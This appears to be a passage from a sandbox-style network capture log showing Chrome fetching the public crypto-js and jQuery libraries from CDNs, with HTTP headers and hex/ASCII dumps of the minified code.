                                                                                                                                                                                                                                            2025-01-10 12:36:35 UTC1369INData Raw: 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 22 3b 76 61 72 20 70 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 70 2e 73 74 79 6c 65 2e 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 2c 70 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 70 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 3b
                                                                                                                                                                                                                                            Data Ascii: rmOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style.background="rgba(0,0,0,0.4)";var p=document.createElement("div");p.style.display="table-cell",p.style.verticalAlign="middle",p.style.width="100vw",p.style.height="100vh";


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            118192.168.2.1749837104.17.24.144435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:35 UTC386OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                                                                                                                                                                                                            Host: cdnjs.cloudflare.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:36:35 UTC964INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:35 GMT
                                                                                                                                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                            Cache-Control: public, max-age=30672000
                                                                                                                                                                                                                                            ETag: W/"61182885-40eb"
                                                                                                                                                                                                                                            Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                                                                                                                                                                                                            cf-cdnjs-via: cfworker/kv
                                                                                                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                            Age: 170406
                                                                                                                                                                                                                                            Expires: Wed, 31 Dec 2025 12:36:35 GMT
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BHyQ8KG62tZgkz3w%2FpqUs%2B69A68re2AgTGQx0%2BGVSp6RgOMb%2BLjlzoasEA8ofpcxlnuQbfcxRzXyC7f%2BdNYXTQhHLWNmtT2Ma8g9rGIFOzd9pcs2UuqIT9oUq9C5WsEutgDbHcqb"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=15780000
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb6a80aa6c3ff-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            2025-01-10 12:36:35 UTC405INData Raw: 37 62 65 64 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                                                                                                                                                                                                            Data Ascii: 7bed!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                                                                                                                                                                                                            2025-01-10 12:36:35 UTC1369INData Raw: 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63
                                                                                                                                                                                                                                            Data Ascii: typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Objec
                                                                                                                                                                                                                                            2025-01-10 12:36:35 UTC1369INData Raw: 6c 6f 6e 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d
                                                                                                                                                                                                                                            Data Ascii: lone.call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.random
                                                                                                                                                                                                                                            2025-01-10 12:36:35 UTC1369INData Raw: 22 3d 3d 74 79 70 65 6f 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d
                                                                                                                                                                                                                                            Data Ascii: "==typeof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=
                                                                                                                                                                                                                                            2025-01-10 12:36:35 UTC1369INData Raw: 7b 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b
                                                                                                                                                                                                                                            Data Ascii: {for(var t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[
                                                                                                                                                                                                                                            2025-01-10 12:36:35 UTC1369INData Raw: 3f 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31
                                                                                                                                                                                                                                            Data Ascii: ?1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<1
                                                                                                                                                                                                                                            2025-01-10 12:36:35 UTC1369INData Raw: 62 75 66 66 65 72 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67
                                                                                                                                                                                                                                            Data Ascii: buffer,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={string
                                                                                                                                                                                                                                            2025-01-10 12:36:35 UTC1369INData Raw: 6f 3d 72 2e 63 68 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b
                                                                                                                                                                                                                                            Data Ascii: o=r.charAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJK
                                                                                                                                                                                                                                            2025-01-10 12:36:35 UTC1369INData Raw: 2e 61 62 73 28 61 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20
                                                                                                                                                                                                                                            Data Ascii: .abs(a.sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var
                                                                                                                                                                                                                                            2025-01-10 12:36:35 UTC1369INData Raw: 41 5b 33 39 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77
                                                                                                                                                                                                                                            Data Ascii: A[39]),m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            119192.168.2.1749838151.101.2.1374435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:35 UTC358OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                                                                                                                                                                            Host: code.jquery.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:36:35 UTC613INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Content-Length: 89501
                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                            Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                                                                                                                                                            ETag: "28feccc0-15d9d"
                                                                                                                                                                                                                                            Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                            Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:35 GMT
                                                                                                                                                                                                                                            Age: 1997121
                                                                                                                                                                                                                                            X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740075-EWR
                                                                                                                                                                                                                                            X-Cache: HIT, HIT
                                                                                                                                                                                                                                            X-Cache-Hits: 2774, 2
                                                                                                                                                                                                                                            X-Timer: S1736512595.253631,VS0,VE0
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            2025-01-10 12:36:35 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                                                                                                                                                            Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                                                                                                                                                                            2025-01-10 12:36:35 UTC16384INData Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c
                                                                                                                                                                                                                                            Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]||(a[S]={}))[a.uniqueID]|
                                                                                                                                                                                                                                            2025-01-10 12:36:35 UTC16384INData Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e
                                                                                                                                                                                                                                            Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t||(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
                                                                                                                                                                                                                                            2025-01-10 12:36:35 UTC16384INData Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65
